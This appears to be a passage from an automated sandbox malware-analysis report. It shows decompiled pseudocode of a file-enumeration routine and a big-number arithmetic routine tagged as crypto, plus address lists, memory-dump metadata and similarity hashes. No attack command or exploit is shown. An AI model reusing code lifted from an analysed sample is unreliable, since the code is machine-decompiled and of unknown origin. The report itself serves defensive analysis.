				goto 0x35c6014d;
				if (_t142 == _t250) goto 0x35c6002c;
				_t109 = ( *_t167 & 0x0000ffff) - 0x2f - 0x2d;
				if (_t109 > 0) goto 0x35c60023;
				asm("dec eax");
				if (_t109 < 0) goto 0x35c6002c;
				_t168 = _t167 - 2;
				if (_t168 != _t250) goto 0x35c6000d;
				_t96 =  *_t168 & 0x0000ffff;
				if (_t96 != 0x3a) goto 0x35c6003e;
				_t143 =  &(_t250[1]);
				if (_t168 != _t143) goto 0x35c6008d;
				_t113 = _t96 - 0x2f - 0x2d;
				if (_t113 > 0) goto 0x35c60053;
				asm("dec eax");
				if (_t113 < 0) goto 0x35c60056;
				 *((intOrPtr*)(_t226 + 0x28)) = r12d;
				 *(_t226 + 0x20) = _t239;
				asm("dec ebp");
				r9d = 0;
				FindFirstFileExW(_t258, _t249, _t244);
				if (_t143 != 0xffffffff) goto 0x35c600b9;
				if (E00007FF77FF735C60318(_t143, _t250, _t239,  *((intOrPtr*)(_t226 + 0x38)), _t239, _t226 + 0x30) != 0) goto 0x35c60188;
				goto 0x35c6014d;
				_t240 =  *((intOrPtr*)(_t226 + 0x38)) -  *((intOrPtr*)(_t226 + 0x30)) >> 3;
				if ( *((short*)(_t223 - 0x74)) != 0x2e) goto 0x35c600e1;
				_t70 =  *(_t223 - 0x72) & 0x0000ffff;
				if (_t70 == 0) goto 0x35c600ff;
				if (_t70 != 0x2e) goto 0x35c600e1;
				if ( *((intOrPtr*)(_t223 - 0x70)) == 0) goto 0x35c600ff;
				if (E00007FF77FF735C60318(_t143, _t223 - 0x74, _t250,  *((intOrPtr*)(_t226 + 0x38)) -  *((intOrPtr*)(_t226 + 0x30)) >> 3, _t244 & (_t168 - _t250 >> 0x00000001) + 0x00000001, _t226 + 0x30) != 0) goto 0x35c6017f;
				if (FindNextFileW(_t239) != 0) goto 0x35c600c5;
				_t220 =  *((intOrPtr*)(_t226 + 0x38));
				_t211 =  *((intOrPtr*)(_t226 + 0x30));
				if (_t240 == _t220 - _t211 >> 3) goto 0x35c60141;
				_t33 =  &(_t143[4]); // 0x8
				r8d = _t33;
				E00007FF77FF735C65970(_t143, _t211 + _t240 * 8, (_t220 - _t211 >> 3) - _t240, _t211, _t220, _t223, _t244 & (_t168 - _t250 >> 0x00000001) + 0x00000001, 0x7ff735c5ff14, __rcx);
				FindClose(_t207);
				r12d = 0;
				_t260 = __rcx + 8;
				goto 0x35c5ff9e;
				_t154 = _t211;
				if (_t211 ==  *((intOrPtr*)(_t226 + 0x38))) goto 0x35c6022b;
				E00007FF77FF735C59468( *_t260,  *_t154);
				if (_t154 + 8 !=  *((intOrPtr*)(_t226 + 0x38))) goto 0x35c60167;
				goto 0x35c6022b;
				FindClose(_t214);
				_t212 =  *((intOrPtr*)(_t226 + 0x30));
				_t156 = _t212;
				if (_t212 ==  *((intOrPtr*)(_t226 + 0x38))) goto 0x35c6022b;
				_t180 =  *_t156;
				_t77 = E00007FF77FF735C59468( *_t260, _t180);
				if (_t156 + 8 !=  *((intOrPtr*)(_t226 + 0x38))) goto 0x35c6019b;
				goto 0x35c6022b;
				_t202 = _t240;
				 *(_t226 + 0x48) = _t202;
				_t145 = _t212;
				_t254 = (_t220 - _t212 >> 3) + 1;
				if (_t212 == _t220) goto 0x35c601f2;
				_t182 = (_t180 | 0xffffffff) + 1;
				if ( *((intOrPtr*)( *_t145 + _t182 * 2)) != r12w) goto 0x35c601d4;
				_t146 = _t145 + 8;
				if (_t146 != _t220) goto 0x35c601cd;
				 *(_t226 + 0x48) = _t202 + 1 + _t182;
				r8d = 2;
				E00007FF77FF735C5740C(_t77, _t254, _t202 + 1 + _t182, _t244 & (_t168 - _t250 >> 0x00000001) + 0x00000001);
				if (_t146 != 0) goto 0x35c6023a;
				E00007FF77FF735C59468(_t146, _t254);
				_t159 = _t212;
				if (_t212 == _t220) goto 0x35c60228;
				E00007FF77FF735C59468(_t146,  *_t159);
				_t160 = _t159 + 8;
				if (_t160 != _t220) goto 0x35c60217;
				E00007FF77FF735C59468(_t146, _t212);
				goto 0x35c602d8;
				_t186 = _t146 + _t254 * 8;
				_t255 = _t212;
				 *((long long*)(_t223 + 0x1b0)) = _t186;
				_t241 = _t186;
				if (_t212 == _t220) goto 0x35c602a6;
				if ( *((intOrPtr*)( *_t255 + ((_t260 | 0xffffffff) + 1) * 2)) != 0) goto 0x35c6025f;
				if (E00007FF77FF735C5FE18(_t241 - _t186 >> 1, _t160, _t241,  *(_t226 + 0x48) - (_t241 - _t186 >> 1), _t220,  *_t255, (_t260 | 0xffffffff) + 2, _t222) != 0) goto 0x35c60302;
				 *((long long*)(_t255 + _t160 - _t212)) = _t241;
				if (_t255 + 8 != _t220) goto 0x35c60256;
				 *((long long*)( *((intOrPtr*)(_t226 + 0x50)))) = _t160;
				E00007FF77FF735C59468( *((intOrPtr*)(_t226 + 0x50)),  *((intOrPtr*)(_t223 + 0x1b0)));
				_t161 = _t212;
				if (_t212 == _t220) goto 0x35c602ce;
				E00007FF77FF735C59468( *((intOrPtr*)(_t226 + 0x50)),  *_t161);
				if (_t161 + 8 != _t220) goto 0x35c602bd;
				E00007FF77FF735C59468( *((intOrPtr*)(_t226 + 0x50)), _t212);
				return E00007FF77FF735C4A410(0, 0,  *(_t223 + 0x1b8) ^ _t226);
			}

















































                                                                                                                                                                                                                              0x7ff735c5ff28
                                                                                                                                                                                                                              0x7ff735c5ff38
                                                                                                                                                                                                                              0x7ff735c5ff40
                                                                                                                                                                                                                              0x7ff735c5ff47
                                                                                                                                                                                                                              0x7ff735c5ff4e
                                                                                                                                                                                                                              0x7ff735c5ff51
                                                                                                                                                                                                                              0x7ff735c5ff58
                                                                                                                                                                                                                              0x7ff735c5ff5b
                                                                                                                                                                                                                              0x7ff735c5ff66
                                                                                                                                                                                                                              0x7ff735c5ff68
                                                                                                                                                                                                                              0x7ff735c5ff6d
                                                                                                                                                                                                                              0x7ff735c5ff72
                                                                                                                                                                                                                              0x7ff735c5ff74
                                                                                                                                                                                                                              0x7ff735c5ff7b
                                                                                                                                                                                                                              0x7ff735c5ff80
                                                                                                                                                                                                                              0x7ff735c5ff83
                                                                                                                                                                                                                              0x7ff735c5ff86
                                                                                                                                                                                                                              0x7ff735c5ff89
                                                                                                                                                                                                                              0x7ff735c5ff99
                                                                                                                                                                                                                              0x7ff735c5ffa1
                                                                                                                                                                                                                              0x7ff735c5ffae
                                                                                                                                                                                                                              0x7ff735c5ffbb
                                                                                                                                                                                                                              0x7ff735c5ffcd
                                                                                                                                                                                                                              0x7ff735c5ffd2
                                                                                                                                                                                                                              0x7ff735c5ffdb
                                                                                                                                                                                                                              0x7ff735c5ffe2
                                                                                                                                                                                                                              0x7ff735c5ffe7
                                                                                                                                                                                                                              0x7ff735c5fff8
                                                                                                                                                                                                                              0x7ff735c60003
                                                                                                                                                                                                                              0x7ff735c6000b
                                                                                                                                                                                                                              0x7ff735c60014
                                                                                                                                                                                                                              0x7ff735c60018
                                                                                                                                                                                                                              0x7ff735c6001d
                                                                                                                                                                                                                              0x7ff735c60021
                                                                                                                                                                                                                              0x7ff735c60023
                                                                                                                                                                                                                              0x7ff735c6002a
                                                                                                                                                                                                                              0x7ff735c6002c
                                                                                                                                                                                                                              0x7ff735c60033
                                                                                                                                                                                                                              0x7ff735c60035
                                                                                                                                                                                                                              0x7ff735c6003c
                                                                                                                                                                                                                              0x7ff735c60042
                                                                                                                                                                                                                              0x7ff735c60046
                                                                                                                                                                                                                              0x7ff735c6004b
                                                                                                                                                                                                                              0x7ff735c60051
                                                                                                                                                                                                                              0x7ff735c60059
                                                                                                                                                                                                                              0x7ff735c60069
                                                                                                                                                                                                                              0x7ff735c60070
                                                                                                                                                                                                                              0x7ff735c60073
                                                                                                                                                                                                                              0x7ff735c6007e
                                                                                                                                                                                                                              0x7ff735c6008b
                                                                                                                                                                                                                              0x7ff735c600a4
                                                                                                                                                                                                                              0x7ff735c600b4
                                                                                                                                                                                                                              0x7ff735c600c0
                                                                                                                                                                                                                              0x7ff735c600ca
                                                                                                                                                                                                                              0x7ff735c600cc
                                                                                                                                                                                                                              0x7ff735c600d3
                                                                                                                                                                                                                              0x7ff735c600d9
                                                                                                                                                                                                                              0x7ff735c600df
                                                                                                                                                                                                                              0x7ff735c600f9
                                                                                                                                                                                                                              0x7ff735c6010f
                                                                                                                                                                                                                              0x7ff735c60111
                                                                                                                                                                                                                              0x7ff735c60116
                                                                                                                                                                                                                              0x7ff735c60128
                                                                                                                                                                                                                              0x7ff735c60138
                                                                                                                                                                                                                              0x7ff735c60138
                                                                                                                                                                                                                              0x7ff735c6013c
                                                                                                                                                                                                                              0x7ff735c60144
                                                                                                                                                                                                                              0x7ff735c6014a
                                                                                                                                                                                                                              0x7ff735c6014d
                                                                                                                                                                                                                              0x7ff735c60154
                                                                                                                                                                                                                              0x7ff735c60159
                                                                                                                                                                                                                              0x7ff735c60161
                                                                                                                                                                                                                              0x7ff735c6016a
                                                                                                                                                                                                                              0x7ff735c60178
                                                                                                                                                                                                                              0x7ff735c6017a
                                                                                                                                                                                                                              0x7ff735c60182
                                                                                                                                                                                                                              0x7ff735c60188
                                                                                                                                                                                                                              0x7ff735c6018d
                                                                                                                                                                                                                              0x7ff735c60195
                                                                                                                                                                                                                              0x7ff735c6019b
                                                                                                                                                                                                                              0x7ff735c6019e
                                                                                                                                                                                                                              0x7ff735c601ac
                                                                                                                                                                                                                              0x7ff735c601ae
                                                                                                                                                                                                                              0x7ff735c601b3
                                                                                                                                                                                                                              0x7ff735c601b9
                                                                                                                                                                                                                              0x7ff735c601c2
                                                                                                                                                                                                                              0x7ff735c601c5
                                                                                                                                                                                                                              0x7ff735c601cb
                                                                                                                                                                                                                              0x7ff735c601d4
                                                                                                                                                                                                                              0x7ff735c601dc
                                                                                                                                                                                                                              0x7ff735c601e1
                                                                                                                                                                                                                              0x7ff735c601eb
                                                                                                                                                                                                                              0x7ff735c601ed
                                                                                                                                                                                                                              0x7ff735c601f2
                                                                                                                                                                                                                              0x7ff735c601fb
                                                                                                                                                                                                                              0x7ff735c60206
                                                                                                                                                                                                                              0x7ff735c6020a
                                                                                                                                                                                                                              0x7ff735c6020f
                                                                                                                                                                                                                              0x7ff735c60215
                                                                                                                                                                                                                              0x7ff735c6021a
                                                                                                                                                                                                                              0x7ff735c6021f
                                                                                                                                                                                                                              0x7ff735c60226
                                                                                                                                                                                                                              0x7ff735c6022e
                                                                                                                                                                                                                              0x7ff735c60235
                                                                                                                                                                                                                              0x7ff735c6023a
                                                                                                                                                                                                                              0x7ff735c6023e
                                                                                                                                                                                                                              0x7ff735c60241
                                                                                                                                                                                                                              0x7ff735c60248
                                                                                                                                                                                                                              0x7ff735c6024e
                                                                                                                                                                                                                              0x7ff735c60267
                                                                                                                                                                                                                              0x7ff735c6028c
                                                                                                                                                                                                                              0x7ff735c60295
                                                                                                                                                                                                                              0x7ff735c602a4
                                                                                                                                                                                                                              0x7ff735c602ad
                                                                                                                                                                                                                              0x7ff735c602b0
                                                                                                                                                                                                                              0x7ff735c602b5
                                                                                                                                                                                                                              0x7ff735c602bb
                                                                                                                                                                                                                              0x7ff735c602c0
                                                                                                                                                                                                                              0x7ff735c602cc
                                                                                                                                                                                                                              0x7ff735c602d1
                                                                                                                                                                                                                              0x7ff735c60301

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2227656907-0
                                                                                                                                                                                                                              • Opcode ID: 94ae03ececf6fcc19d3240190a0620e05faf9237e129f85902a44f27d73d17a8
                                                                                                                                                                                                                              • Instruction ID: 42f865760399d7415e26bcc9d2b9fe1c5eea6ef6319f039b1afeca8e7299ba61
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 94ae03ececf6fcc19d3240190a0620e05faf9237e129f85902a44f27d73d17a8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6EB1D663B1869351EA61AB62D5002B9E3A0EF44FD8F885631EE5D27BC5EF3CE541D320
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C61F60 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 329COMMONCrypto
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 69%
                                                                                                                                                                                                                              			E00007FF77FF735C61F60(signed int __ecx, signed int __rax, signed int* __rcx, unsigned int __rdx, signed int __r9, void* __r10, long long __r13, signed int _a8, long long _a16, signed int _a24, signed int _a32) {
				long long _v64;
				char _v532;
				intOrPtr _v536;
				signed long long _v552;
				signed int _v560;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				intOrPtr _v584;
				void* __rbx;
				void* __rsi;
				void* _t132;
				signed int _t148;
				intOrPtr _t161;
				signed int _t163;
				intOrPtr _t164;
				signed int _t180;
				signed int _t191;
				signed int _t192;
				signed int _t213;
				void* _t230;
				signed long long _t241;
				signed int _t244;
				void* _t252;
				signed int* _t255;
				intOrPtr* _t262;
				signed long long _t267;
				signed long long _t269;
				signed long long _t271;
				signed long long _t273;
				signed long long _t277;
				signed long long _t279;
				char* _t285;
				signed int _t288;
				signed long long _t289;
				signed long long _t297;
				signed long long _t298;
				void* _t306;
				signed long long _t327;

				_a16 = __rdx;
				r10d =  *__rcx;
				if (r10d == 0) goto 0x35c623d5;
				_t161 =  *__rdx;
				_v584 = _t161;
				if (_t161 == 0) goto 0x35c623d5;
				r10d = r10d - 1;
				if (_t252 - 1 != 0) goto 0x35c62091;
				r12d =  *(__rdx + 4);
				if (r12d != 1) goto 0x35c61fd6;
				_t255 =  &(__rcx[1]);
				 *__rcx = 0;
				r9d = 0;
				_v536 = 0;
				E00007FF77FF735C6362C(__rax, _t252, _t255, __rdx, __rcx,  &_v532, __r9);
				goto 0x35c623d7;
				if (r10d != 0) goto 0x35c62011;
				_t163 = _t255[1];
				 *_t255 = 0;
				r9d = 0;
				_v536 = 0;
				E00007FF77FF735C6362C(__rax, _t252,  &(_t255[1]), __rdx, __rcx,  &_v532, __r9);
				_t180 = _t163 % r12d;
				__rcx[1] = _t180;
				bpl = _t180 != 0;
				 *__rcx = 0;
				goto 0x35c623d7;
				r15d = 0xffffffff;
				if (r10d == r15d) goto 0x35c62055;
				asm("o16 nop [eax+eax]");
				r10d = r10d + r15d;
				if (r10d != r15d) goto 0x35c62030;
				r9d = 0;
				_v536 = 0;
				_t285 =  &_v532;
				 *__rcx = 0;
				_t132 = E00007FF77FF735C6362C(__rax | _t279 << 0x00000020, _t252,  &(__rcx[1]), __rdx, __rcx, _t285, __r9);
				__rcx[1] = r14d;
				__rcx[2] = __ecx;
				bpl = __ecx != 0;
				 *__rcx = 1;
				goto 0x35c623d7;
				if (_t132 - r10d > 0) goto 0x35c623d5;
				r8d = r10d;
				_t269 = r10d;
				r8d = r8d - _t132;
				r9d = r10d;
				_t277 = r8d;
				if (_t269 - _t277 < 0) goto 0x35c620f7;
				_t262 = (__rdx >> 0x20) + 4 + _t269 * 4;
				if ( *((intOrPtr*)(__rdx - _t277 * 4 - __rcx + _t262)) !=  *_t262) goto 0x35c620e0;
				r9d = r9d - 1;
				if (_t269 - 1 - _t277 >= 0) goto 0x35c620c7;
				goto 0x35c620f7;
				_t271 = r9d - r8d;
				_t241 = r9d;
				if ( *((intOrPtr*)(__rdx + 4 + _t271 * 4)) -  *(__rcx + 4 + _t241 * 4) >= 0) goto 0x35c620fa;
				r8d = r8d + 1;
				_t213 = r8d;
				if (_t213 == 0) goto 0x35c623d5;
				r9d =  *(__rdx + 4 + _t241 * 4);
				r11d =  *(__rdx + 4 + _t241 * 4);
				asm("inc ecx");
				_a24 = r11d;
				if (_t213 == 0) goto 0x35c62141;
				r12d = 0x20;
				r12d = r12d - 0x1f;
				_a8 = r12d;
				if (0x1f - _t252 - 2 == 0) goto 0x35c6218d;
				goto 0x35c62150;
				_a8 = 0;
				r12d = 0;
				r9d = r11d >> r12d;
				r11d = r11d << 0x20;
				r9d = r9d | r9d << 0x00000020;
				_a24 = r11d;
				if (_t163 - 2 <= 0) goto 0x35c6218d;
				r11d = r11d |  *(__rdx + 4 + _t241 * 4) >> r12d;
				_a24 = r11d;
				r14d = _t285 - 1;
				_v560 = _t279;
				if (r14d < 0) goto 0x35c6239e;
				r15d = 0xffffffff;
				_v64 = __r13;
				r13d = __rdx + _t252;
				_v552 = _t241;
				_v568 = __r9;
				if (r13d - r10d > 0) goto 0x35c621cd;
				goto 0x35c621cf;
				_a32 = 0;
				r11d =  *(__rcx + 4 + _t241 * 4);
				_v576 = _t262 - 4;
				_v572 = 0;
				if (0x20 == 0) goto 0x35c62227;
				r8d = r11d;
				r11d = r11d << 0x20;
				if (r13d - 3 < 0) goto 0x35c6222c;
				_t148 =  *(__rcx + 4 + (_v576 << 0x20) * 4) >> r12d;
				r11d = r11d | _t148;
				goto 0x35c6222c;
				_t288 = _v576;
				_t244 = _t288;
				r8d = _t148 % __r9;
				if (_t244 - _t327 <= 0) goto 0x35c62258;
				_t297 = _t327;
				_t289 = _t288 + 0x1;
				if (_t289 - _t327 > 0) goto 0x35c62291;
				_t267 = _t289 << 0x00000020 | _t279;
				if (0x1 - _t267 <= 0) goto 0x35c6228d;
				_t298 = _t297 - 1;
				if (_t289 + _v568 - _t327 <= 0) goto 0x35c62270;
				_t164 = _v584;
				if (_t298 == 0) goto 0x35c62370;
				r11d = 0;
				if (_t164 == 0) goto 0x35c62313;
				r15d = _a8;
				r8d = r10d;
				_t306 =  >=  ? _t279 + 0x1 >> 0x20 : (_t279 + 0x1 >> 0x20) + 1;
				r11d = r11d + 1;
				 *((intOrPtr*)(__rcx + 4 + _t267 * 4)) = __rcx[0xffffffff00000002] - r8d;
				if (r11d - _t164 < 0) goto 0x35c622c0;
				_a8 = r15d;
				r15d = 0xffffffff;
				r12d = _a8;
				if (0x1 - _t306 >= 0) goto 0x35c6236c;
				r10d = 0;
				if (_t164 == 0) goto 0x35c62369;
				asm("o16 nop [eax+eax]");
				r10d = r10d + 1;
				_t273 =  &(__rcx[0xffffffff00000001]);
				 *(_t273 + 4) = r8d;
				_t230 = r10d - _t164;
				if (_t230 < 0) goto 0x35c62340;
				r10d = __r13 - 1;
				r13d = r13d - 1;
				r14d = r14d - 1;
				_v560 = (_v560 << 0x20) + 0x1;
				if (_t230 >= 0) goto 0x35c621c1;
				_t191 = _t306 + 1;
				if (_t191 -  *__rcx >= 0) goto 0x35c623bc;
				 *((intOrPtr*)(__rcx + 4 + ((0x1 + _t244) * _v568 * _t297 - _t271) * _t298 * 4)) = 0;
				if (_t191 + 1 -  *__rcx < 0) goto 0x35c623b0;
				 *__rcx = _t191;
				if (_t191 == 0) goto 0x35c623d0;
				_t192 = _t191 - 1;
				if ( *((intOrPtr*)(__rcx + 4 + _t273 * 4)) != 0) goto 0x35c623d0;
				 *__rcx = _t192;
				if (_t192 != 0) goto 0x35c623c2;
				goto 0x35c623d7;
				return 0;
			}










































                                                                                                                                                                                                                              0x7ff735c61f60
                                                                                                                                                                                                                              0x7ff735c61f76
                                                                                                                                                                                                                              0x7ff735c61f82
                                                                                                                                                                                                                              0x7ff735c61f88
                                                                                                                                                                                                                              0x7ff735c61f8a
                                                                                                                                                                                                                              0x7ff735c61f90
                                                                                                                                                                                                                              0x7ff735c61f96
                                                                                                                                                                                                                              0x7ff735c61f9e
                                                                                                                                                                                                                              0x7ff735c61fa4
                                                                                                                                                                                                                              0x7ff735c61fae
                                                                                                                                                                                                                              0x7ff735c61fb8
                                                                                                                                                                                                                              0x7ff735c61fbc
                                                                                                                                                                                                                              0x7ff735c61fbe
                                                                                                                                                                                                                              0x7ff735c61fc1
                                                                                                                                                                                                                              0x7ff735c61fca
                                                                                                                                                                                                                              0x7ff735c61fd1
                                                                                                                                                                                                                              0x7ff735c61fd9
                                                                                                                                                                                                                              0x7ff735c61fdb
                                                                                                                                                                                                                              0x7ff735c61fe3
                                                                                                                                                                                                                              0x7ff735c61fe5
                                                                                                                                                                                                                              0x7ff735c61fec
                                                                                                                                                                                                                              0x7ff735c61ff5
                                                                                                                                                                                                                              0x7ff735c61ffe
                                                                                                                                                                                                                              0x7ff735c62003
                                                                                                                                                                                                                              0x7ff735c62006
                                                                                                                                                                                                                              0x7ff735c6200a
                                                                                                                                                                                                                              0x7ff735c6200c
                                                                                                                                                                                                                              0x7ff735c62011
                                                                                                                                                                                                                              0x7ff735c62020
                                                                                                                                                                                                                              0x7ff735c62025
                                                                                                                                                                                                                              0x7ff735c6203b
                                                                                                                                                                                                                              0x7ff735c62053
                                                                                                                                                                                                                              0x7ff735c62055
                                                                                                                                                                                                                              0x7ff735c62058
                                                                                                                                                                                                                              0x7ff735c6205c
                                                                                                                                                                                                                              0x7ff735c62061
                                                                                                                                                                                                                              0x7ff735c6206c
                                                                                                                                                                                                                              0x7ff735c62074
                                                                                                                                                                                                                              0x7ff735c62081
                                                                                                                                                                                                                              0x7ff735c62084
                                                                                                                                                                                                                              0x7ff735c6208a
                                                                                                                                                                                                                              0x7ff735c6208c
                                                                                                                                                                                                                              0x7ff735c62094
                                                                                                                                                                                                                              0x7ff735c6209a
                                                                                                                                                                                                                              0x7ff735c6209d
                                                                                                                                                                                                                              0x7ff735c620a0
                                                                                                                                                                                                                              0x7ff735c620a3
                                                                                                                                                                                                                              0x7ff735c620a6
                                                                                                                                                                                                                              0x7ff735c620ac
                                                                                                                                                                                                                              0x7ff735c620c3
                                                                                                                                                                                                                              0x7ff735c620cd
                                                                                                                                                                                                                              0x7ff735c620cf
                                                                                                                                                                                                                              0x7ff735c620dc
                                                                                                                                                                                                                              0x7ff735c620de
                                                                                                                                                                                                                              0x7ff735c620e6
                                                                                                                                                                                                                              0x7ff735c620e9
                                                                                                                                                                                                                              0x7ff735c620f5
                                                                                                                                                                                                                              0x7ff735c620f7
                                                                                                                                                                                                                              0x7ff735c620fa
                                                                                                                                                                                                                              0x7ff735c620fd
                                                                                                                                                                                                                              0x7ff735c62108
                                                                                                                                                                                                                              0x7ff735c62110
                                                                                                                                                                                                                              0x7ff735c62115
                                                                                                                                                                                                                              0x7ff735c62119
                                                                                                                                                                                                                              0x7ff735c62121
                                                                                                                                                                                                                              0x7ff735c62128
                                                                                                                                                                                                                              0x7ff735c62130
                                                                                                                                                                                                                              0x7ff735c62133
                                                                                                                                                                                                                              0x7ff735c6213d
                                                                                                                                                                                                                              0x7ff735c6213f
                                                                                                                                                                                                                              0x7ff735c62146
                                                                                                                                                                                                                              0x7ff735c6214d
                                                                                                                                                                                                                              0x7ff735c6215f
                                                                                                                                                                                                                              0x7ff735c62162
                                                                                                                                                                                                                              0x7ff735c62165
                                                                                                                                                                                                                              0x7ff735c62168
                                                                                                                                                                                                                              0x7ff735c62173
                                                                                                                                                                                                                              0x7ff735c62182
                                                                                                                                                                                                                              0x7ff735c62185
                                                                                                                                                                                                                              0x7ff735c6218d
                                                                                                                                                                                                                              0x7ff735c62191
                                                                                                                                                                                                                              0x7ff735c6219c
                                                                                                                                                                                                                              0x7ff735c621a5
                                                                                                                                                                                                                              0x7ff735c621ab
                                                                                                                                                                                                                              0x7ff735c621b3
                                                                                                                                                                                                                              0x7ff735c621b7
                                                                                                                                                                                                                              0x7ff735c621bc
                                                                                                                                                                                                                              0x7ff735c621c4
                                                                                                                                                                                                                              0x7ff735c621cb
                                                                                                                                                                                                                              0x7ff735c621cf
                                                                                                                                                                                                                              0x7ff735c621e2
                                                                                                                                                                                                                              0x7ff735c621e7
                                                                                                                                                                                                                              0x7ff735c621ec
                                                                                                                                                                                                                              0x7ff735c621f2
                                                                                                                                                                                                                              0x7ff735c621f9
                                                                                                                                                                                                                              0x7ff735c6220c
                                                                                                                                                                                                                              0x7ff735c62213
                                                                                                                                                                                                                              0x7ff735c62220
                                                                                                                                                                                                                              0x7ff735c62222
                                                                                                                                                                                                                              0x7ff735c62225
                                                                                                                                                                                                                              0x7ff735c62227
                                                                                                                                                                                                                              0x7ff735c6222e
                                                                                                                                                                                                                              0x7ff735c62234
                                                                                                                                                                                                                              0x7ff735c6223d
                                                                                                                                                                                                                              0x7ff735c6224c
                                                                                                                                                                                                                              0x7ff735c62255
                                                                                                                                                                                                                              0x7ff735c6225b
                                                                                                                                                                                                                              0x7ff735c62277
                                                                                                                                                                                                                              0x7ff735c6227d
                                                                                                                                                                                                                              0x7ff735c6227f
                                                                                                                                                                                                                              0x7ff735c6228b
                                                                                                                                                                                                                              0x7ff735c6228d
                                                                                                                                                                                                                              0x7ff735c62294
                                                                                                                                                                                                                              0x7ff735c6229d
                                                                                                                                                                                                                              0x7ff735c622a2
                                                                                                                                                                                                                              0x7ff735c622ac
                                                                                                                                                                                                                              0x7ff735c622d4
                                                                                                                                                                                                                              0x7ff735c622ea
                                                                                                                                                                                                                              0x7ff735c622f1
                                                                                                                                                                                                                              0x7ff735c622f4
                                                                                                                                                                                                                              0x7ff735c622fb
                                                                                                                                                                                                                              0x7ff735c622fd
                                                                                                                                                                                                                              0x7ff735c62305
                                                                                                                                                                                                                              0x7ff735c6230b
                                                                                                                                                                                                                              0x7ff735c6231d
                                                                                                                                                                                                                              0x7ff735c6231f
                                                                                                                                                                                                                              0x7ff735c62324
                                                                                                                                                                                                                              0x7ff735c62335
                                                                                                                                                                                                                              0x7ff735c62344
                                                                                                                                                                                                                              0x7ff735c6234b
                                                                                                                                                                                                                              0x7ff735c6235c
                                                                                                                                                                                                                              0x7ff735c62364
                                                                                                                                                                                                                              0x7ff735c62367
                                                                                                                                                                                                                              0x7ff735c6236c
                                                                                                                                                                                                                              0x7ff735c62375
                                                                                                                                                                                                                              0x7ff735c62387
                                                                                                                                                                                                                              0x7ff735c6238b
                                                                                                                                                                                                                              0x7ff735c62390
                                                                                                                                                                                                                              0x7ff735c6239e
                                                                                                                                                                                                                              0x7ff735c623a6
                                                                                                                                                                                                                              0x7ff735c623b4
                                                                                                                                                                                                                              0x7ff735c623ba
                                                                                                                                                                                                                              0x7ff735c623bc
                                                                                                                                                                                                                              0x7ff735c623c0
                                                                                                                                                                                                                              0x7ff735c623c2
                                                                                                                                                                                                                              0x7ff735c623c8
                                                                                                                                                                                                                              0x7ff735c623ca
                                                                                                                                                                                                                              0x7ff735c623ce
                                                                                                                                                                                                                              0x7ff735c623d3
                                                                                                                                                                                                                              0x7ff735c623e8

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memcpy_s
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1502251526-3916222277
                                                                                                                                                                                                                              • Opcode ID: dbe32003fc979fca20096e7f857c02f8f250bdb8c637356438d5f2f7703990db
                                                                                                                                                                                                                              • Instruction ID: a1045162ac8b7317cf274220648ceedf8cbb459a8957ce84ac6d371690a1359f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dbe32003fc979fca20096e7f857c02f8f250bdb8c637356438d5f2f7703990db
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E7C1E273B1828797D720DF15A048A6AF795F784B88F889235DB4A43B84DB3CE941DB10
                                                                                                                                                                                                                              Uniqueness

